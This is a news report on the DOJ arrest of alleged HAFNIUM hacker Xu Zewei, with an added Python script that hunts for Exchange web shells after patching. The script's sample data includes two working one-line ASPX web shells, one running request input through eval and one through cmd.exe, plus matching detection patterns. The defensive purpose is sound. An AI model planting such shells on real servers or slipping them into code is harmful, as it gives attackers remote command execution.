Houston, July 9, 2025 — The U.S. Justice Department has announced the arrest of Xu Zewei, a 33-year-old Chinese national alleged to have worked as a contract hacker for China's Ministry of State Security (MSS) and to have been a leading participant in the intrusion campaign publicly tracked as "HAFNIUM".
Xu was detained in Milan, Italy on July 3 at the request of the United States. He is accused of carrying out computer intrusions around the world under the direction of the MSS.
The Southern District of Texas has unsealed a nine-count indictment against Xu and his co-defendant Zhang Yu, 44, who remains at large.
State-Backed Cyber Intrusions Amid Global Pandemic
According to court documents, Xu was an operative for Shanghai Powerock Network Co. Ltd., one of many technology companies contracted by the MSS’s Shanghai State Security Bureau (SSSB) to execute hacking assignments.
Xu and his team reportedly began targeting US universities, immunologists, and virologists in early 2020, just as the COVID-19 pandemic began to devastate the globe.
The hackers infiltrated research institutions for cutting-edge vaccine, treatment, and testing data.
Reports indicate that Xu kept MSS officers informed at every stage, confirming, for example, his breach of a Texas research university’s network on February 19, 2020.
Under MSS direction, he accessed the mailboxes of prominent virologists to exfiltrate sensitive COVID-19 research, potentially undermining global public health responses.
HAFNIUM and the Exploitation of Microsoft Exchange Vulnerabilities
In late 2020 and early 2021, Xu and his co-conspirators pivoted to exploiting zero-day vulnerabilities in Microsoft Exchange Server, the on-premises email and calendaring server used by thousands of organizations worldwide.
This allowed the group, known publicly as "HAFNIUM," to compromise over 60,000 US entities and directly victimize more than 12,700 organizations before Microsoft publicly disclosed the vulnerabilities and released out-of-band patches in March 2021.
On the compromised servers the attackers installed web shells, small server-side scripts that give remote command execution through ordinary HTTP requests, and used that access to search internal mailboxes for information on COVID-19 research, US policymakers, and other Chinese intelligence interests.
Victims included another Texas university and a major international law firm. Installing the patches closed the entry point but did not remove web shells already written to disk, so hundreds of organizations remained compromised after the public disclosure until the FBI and private cybersecurity firms intervened to remove them.
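The remediation gap described above, that a patched server can still carry the attacker's web shell, is why incident responders sweep the IIS content directories after patching rather than stopping at the patch. The following is an added example, not code from the article or the DOJ filing: a small content-based web shell hunt over ASP.NET handler files. The indicator patterns are heuristics chosen for this example (an assumption, not an authoritative list), modelled on the well-known one-line Jscript shell that evaluates attacker-supplied request data and on pages that spawn a command interpreter; the sample file tree is constructed, not captured evidence.

```python
"""Post-patch web shell hunt for Microsoft Exchange web directories.

Added example, not from the article or the DOJ filing. Applying the patches
closes the exploited entry point but leaves any web shell already written
to disk in place, so remediation has to include a sweep of the IIS content
directories. The indicator patterns are heuristics chosen for this example
(assumption), not a complete or authoritative list.
"""
import re
from pathlib import Path

# File types IIS hands to the ASP.NET engine for execution.
EXECUTABLE_SUFFIXES = (".aspx", ".ashx", ".asmx", ".asax")

# Indicator name -> pattern (heuristics for this example).
INDICATORS = {
    # Exchange's own pages are C#; a Jscript page directive is anomalous.
    "jscript_page": re.compile(r'<%@\s*Page\b[^%]*Language\s*=\s*"?jscript"?', re.I),
    # eval() fed directly from the HTTP request: the one-line shell pattern.
    "eval_request": re.compile(r'\beval\s*\(\s*Request\b', re.I),
    # Inline process spawning from a page body.
    "process_spawn": re.compile(r'System\.Diagnostics\.Process\b', re.I),
    # Command interpreters typically handed to a spawned process.
    "shell_binary": re.compile(r'\b(?:cmd\.exe|powershell(?:\.exe)?)\b', re.I),
}


def match_indicators(content):
    """Return the sorted indicator names that fire on one file's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(content))


def scan_files(files):
    """Scan a {path: content} mapping; return [(path, [indicators])] for hits.

    Only executable ASP.NET suffixes are examined, so a .cs code-behind or
    a .txt note never produces a hit.
    """
    hits = []
    for path in sorted(files):
        if not path.lower().endswith(EXECUTABLE_SUFFIXES):
            continue
        fired = match_indicators(files[path])
        if fired:
            hits.append((path, fired))
    return hits


def scan_directory(root):
    """Read executable handler files under `root` from disk and scan them."""
    files = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in EXECUTABLE_SUFFIXES:
            files[str(p)] = p.read_text(errors="replace")
    return scan_files(files)


# Constructed sample of an IIS content tree (paths and contents are
# illustrative, not real captured files).
SAMPLE_FILES = {
    # Legitimate-looking logon page: C# directive, reads the request, no eval.
    "C:/Exchange/FrontEnd/HttpProxy/owa/auth/logon.aspx":
        '<%@ Page Language="C#" AutoEventWireup="true" %>\n'
        '<% string url = Request.QueryString["url"]; %>',
    # One-line Jscript shell dropped into a web-writable directory.
    "C:/inetpub/wwwroot/aspnet_client/supp0rt.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
    # Shell that runs attacker-supplied commands through cmd.exe.
    "C:/Exchange/FrontEnd/HttpProxy/owa/auth/errorFE.aspx":
        '<%@ Page Language="C#" %>\n'
        '<% var p = new System.Diagnostics.Process();\n'
        '   p.StartInfo.FileName = "cmd.exe";\n'
        '   p.StartInfo.Arguments = "/c " + Request["cmd"]; p.Start(); %>',
    # Code-behind source: not served as a handler, so skipped by the scan.
    "C:/Exchange/FrontEnd/HttpProxy/owa/auth/logon.aspx.cs":
        'var p = new System.Diagnostics.Process();',
}

if __name__ == "__main__":
    for path, fired in scan_files(SAMPLE_FILES):
        print(f"{path}: {', '.join(fired)}")
```

Against the constructed tree the scan flags the two implanted pages and leaves the legitimate-looking logon page and the code-behind file alone. On a real server, `scan_directory` would be pointed at the Exchange FrontEnd and `inetpub` trees; hits should then be compared against file timestamps and the server's own patched baseline, since content heuristics alone will miss obfuscated shells and can flag unusual but legitimate custom pages.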
Broader Implications and Ongoing Pursuit
Authorities warn that the PRC’s decentralized approach, in which private contractors carry out state-directed hacking, has produced collateral damage: the contractors’ indiscriminate intrusions and abandoned implants leave victim systems open to exploitation by other actors and feed a black market for stolen information.
Xu faces multiple felony charges, with maximum sentences ranging from two to twenty years.
Zhang Yu is still at large; the FBI urges anyone with relevant information to call 1-800-CALL-FBI.
The extradition process for Xu is now underway, as the US intensifies efforts to combat state-sponsored cybercrime. All defendants are presumed innocent until proven guilty in court.